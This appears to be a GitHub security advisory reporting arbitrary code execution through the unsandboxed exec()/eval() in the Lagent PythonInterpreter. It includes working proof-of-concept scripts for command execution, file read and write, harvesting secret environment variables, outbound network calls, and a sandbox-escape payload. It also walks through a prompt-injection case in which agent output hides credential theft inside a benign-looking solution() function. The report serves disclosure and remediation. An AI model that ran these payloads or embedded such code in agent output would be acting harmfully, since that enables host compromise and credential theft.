Skip to content

Arbitrary Code Execution via Unsandboxed exec()/eval() in PythonInterpreter #312

@LQxdu

Description

@LQxdu

Summary

Lagent's PythonInterpreter action executes LLM-generated code via exec() and eval() with no sandboxing, allowing arbitrary code execution including OS command execution, arbitrary file read/write, and full system compromise.

Details

Vulnerable Code

GenericRuntime class — the execution engine with no restrictions:

class GenericRuntime:
    GLOBAL_DICT = {}
    LOCAL_DICT = None
    HEADERS = []

    def __init__(self):
        self._global_vars = copy.copy(self.GLOBAL_DICT)  # empty dict {}
        self._local_vars = copy.copy(self.LOCAL_DICT) if self.LOCAL_DICT else None

        for c in self.HEADERS:
            self.exec_code(c)

    def exec_code(self, code_piece: str) -> None:
        exec(code_piece, self._global_vars)       # ← SINK: arbitrary code execution

    def eval_code(self, expr: str) -> Any:
        return eval(expr, self._global_vars)       # ← SINK: arbitrary expression evaluation

PythonInterpreter._call() — the entry point that feeds LLM output to exec():

def _call(self, command: str) -> ActionReturn:
    tool_return = ActionReturn(type=self.name)
    try:
        # Extract code from markdown format
        if '```python' in command:
            command = command.split('```python')[1].split('```')[0]
        elif '```' in command:
            command = command.split('```')[1].split('```')[0]
        
        command = command.split('\n')

        if self.answer_from_stdout:
            # ... redirect stdout, then:
            self.runtime.exec_code('\n'.join(command))    # ← exec() called
        elif self.answer_symbol:
            self.runtime.exec_code('\n'.join(command))    # ← exec() called
        elif self.answer_expr:
            self.runtime.exec_code('\n'.join(command))    # ← exec() called
            res = self.runtime.eval_code(self.answer_expr) # ← eval() called
        else:
            self.runtime.exec_code('\n'.join(command[:-1])) # ← exec() called
            res = self.runtime.eval_code(command[-1])       # ← eval() called

Data Flow

LLM Response (potentially influenced by prompt injection)
    ↓
PythonInterpreter.run(command: str)          # Public API, decorated with @tool_api
    ↓
PythonInterpreter._call(command)              # Extracts code from markdown ```python blocks
    ↓
GenericRuntime.exec_code(code_piece)          # exec(code_piece, self._global_vars)
    ↓
Arbitrary Python code execution               # Full __builtins__ access, import allowed

Proof of Concept

Environment Setup

pip install lagent  # tested with v0.2.4

PoC 1: OS Command Execution (RCE)

from lagent.actions.python_interpreter import PythonInterpreter

interpreter = PythonInterpreter(answer_from_stdout=True)
result = interpreter.run('import os; print("RCE_PROOF:" + os.popen("whoami").read().strip())')
print(result.result)
# Output: [{'type': 'text', 'content': 'RCE_PROOF:username\n'}]

Verified output:

Result: [{'type': 'text', 'content': 'RCE_PROOF:Zhuohao Zhang\n'}]

PoC 2: Arbitrary File Read

from lagent.actions.python_interpreter import PythonInterpreter

interpreter = PythonInterpreter(answer_from_stdout=True)
result = interpreter.run('print("FILE_READ:" + open("config/config.properties").readline().strip())')
print(result.result)
# Output: [{'type': 'text', 'content': 'FILE_READ:withAllJdk = false\n'}]

PoC 3: Direct GenericRuntime Exploitation

from lagent.actions.python_interpreter import GenericRuntime

rt = GenericRuntime()
rt.exec_code('import os')
username = rt.eval_code('os.popen("whoami").read().strip()')
print(username)  # Outputs current username

PoC 4: Arbitrary Directory & File Creation (persistent write)

from lagent.actions.python_interpreter import PythonInterpreter

interpreter = PythonInterpreter(answer_from_stdout=True)
result = interpreter.run('''
import os
os.makedirs("poc_proof_lagent", exist_ok=True)
with open("poc_proof_lagent/pwned.txt", "w") as f:
    f.write("RCE proof - arbitrary file write via Lagent")
print("DIR_EXISTS:" + str(os.path.exists("poc_proof_lagent/pwned.txt")))
''')
print(result.result)
# Output: [{'type': 'text', 'content': 'DIR_EXISTS:True\n'}]

Verified: Directory poc_proof_lagent/ created, file pwned.txt written to disk.

PoC 5: Environment Variable Exfiltration (credential theft)

from lagent.actions.python_interpreter import PythonInterpreter

interpreter = PythonInterpreter(answer_from_stdout=True)
result = interpreter.run('''
import os
secrets = {k: v for k, v in os.environ.items()
           if any(x in k.lower() for x in ["key", "token", "secret", "pass", "api"])}
print("SECRETS:" + str(list(secrets.keys())))
''')
print(result.result)
# Output: [{'type': 'text', 'content': "SECRETS:['AWS_BEARER_TOKEN_BEDROCK']\n"}]

Verified: Extracted AWS_BEARER_TOKEN_BEDROCK from environment — real cloud credential exposed.

PoC 6: Network Access & Outbound HTTP (data exfiltration / C2 callback)

from lagent.actions.python_interpreter import PythonInterpreter

interpreter = PythonInterpreter(answer_from_stdout=True)

# Step 1: Prove network access — leak internal IP
result1 = interpreter.run('''
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
print("INTERNAL_IP:" + s.getsockname()[0])
s.close()
''')
print(result1.result)
# Output: [{'type': 'text', 'content': 'INTERNAL_IP:10.203.141.241\n'}]

# Step 2: Prove outbound HTTP — attacker could exfiltrate data to webhook
result2 = PythonInterpreter(answer_from_stdout=True).run('''
import urllib.request
resp = urllib.request.urlopen("https://httpbin.org/get")
print("HTTP_STATUS:" + str(resp.status))
''')
print(result2.result)
# Output: [{'type': 'text', 'content': 'HTTP_STATUS:200\n'}]

Verified: Internal IP 10.203.141.241 leaked; outbound HTTP requests succeed — attacker could POST stolen credentials to an external server.

PoC 7: Realistic Attack — LLM Generates Malicious solution()

This is the most realistic scenario: the default PythonInterpreter expects LLM to output a solution() function. An attacker uses prompt injection to make the LLM embed malicious code inside the expected format.

from lagent.actions.python_interpreter import PythonInterpreter

# Default config: answer_expr='solution()'
interpreter = PythonInterpreter()

# LLM sends markdown code block with solution() — exactly as designed
# But the code contains malicious side effects before returning
malicious_llm_output = """```python
import os
# Side-effect: exfiltrate env vars before returning "innocent" answer
secrets = str({k: v for k, v in os.environ.items() if "TOKEN" in k or "KEY" in k})
with open("/tmp/exfil.txt", "w") as f:
    f.write(secrets)
def solution():
    return "The answer is 42"
```"""

result = interpreter.run(malicious_llm_output)
print(result.result)
# Output: [{'type': 'text', 'content': 'The answer is 42'}]
# But /tmp/exfil.txt now contains stolen credentials

Key insight: The malicious code runs silently during exec() before solution() is called. The user sees a normal-looking answer while their credentials are stolen in the background.

Root Cause Analysis

Core Issue

The fundamental issue is using Python's exec() and eval() built-in functions to execute untrusted code without any form of sandboxing or restriction. The code passes an empty globals dict {} to these functions, which does not restrict execution — Python automatically injects __builtins__ into any globals dict that doesn't explicitly contain it.

Why Empty Globals Is Not a Defense

# This is NOT sandboxed:
exec("__import__('os').system('id')", {})  # Works — __builtins__ auto-injected

# Even this is exploitable:
exec("__import__('os').system('id')", {"__builtins__": {}})  # Blocked, but...
# Attackers can recover builtins via:
exec("[c for c in ().__class__.__base__.__subclasses__() if c.__name__=='Popen'][0](['id'])", {"__builtins__": {}})

Remediation

Recommended Fix: Subprocess Isolation

The most secure approach is executing code in an isolated subprocess with restricted permissions:

import subprocess
import tempfile
import os

class SecureRuntime:
    def __init__(self, timeout=20):
        self.timeout = timeout
    
    def exec_code(self, code_piece: str) -> str:
        with tempfile.NamedTemporaryFile(mode='w', suffix='.py', delete=False) as f:
            f.write(code_piece)
            f.flush()
            try:
                result = subprocess.run(
                    ['python', f.name],
                    capture_output=True,
                    text=True,
                    timeout=self.timeout,
                    # Restrict: no network, limited filesystem
                    env={
                        'PATH': '',  # No system commands
                        'HOME': tempfile.gettempdir(),
                    }
                )
                return result.stdout
            finally:
                os.unlink(f.name)

Alternative: RestrictedPython (Partial Mitigation)

from RestrictedPython import compile_restricted, safe_globals

class RestrictedRuntime:
    def exec_code(self, code_piece: str) -> None:
        byte_code = compile_restricted(code_piece, '<inline>', 'exec')
        exec(byte_code, safe_globals.copy())

Note: RestrictedPython itself has known bypasses (CVE-2023-37271, CVE-2023-41039), so subprocess isolation is preferred.

Minimum Fix: Strip __builtins__

At minimum, prevent direct __import__ access (though this is bypassable):

 def exec_code(self, code_piece: str) -> None:
-    exec(code_piece, self._global_vars)
+    restricted_globals = {**self._global_vars, '__builtins__': {
+        'print': print, 'range': range, 'len': len, 'int': int,
+        'float': float, 'str': str, 'list': list, 'dict': dict,
+        'True': True, 'False': False, 'None': None,
+    }}
+    exec(code_piece, restricted_globals)

Warning: Builtins restriction alone is insufficient — subclass traversal attacks can recover full access.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions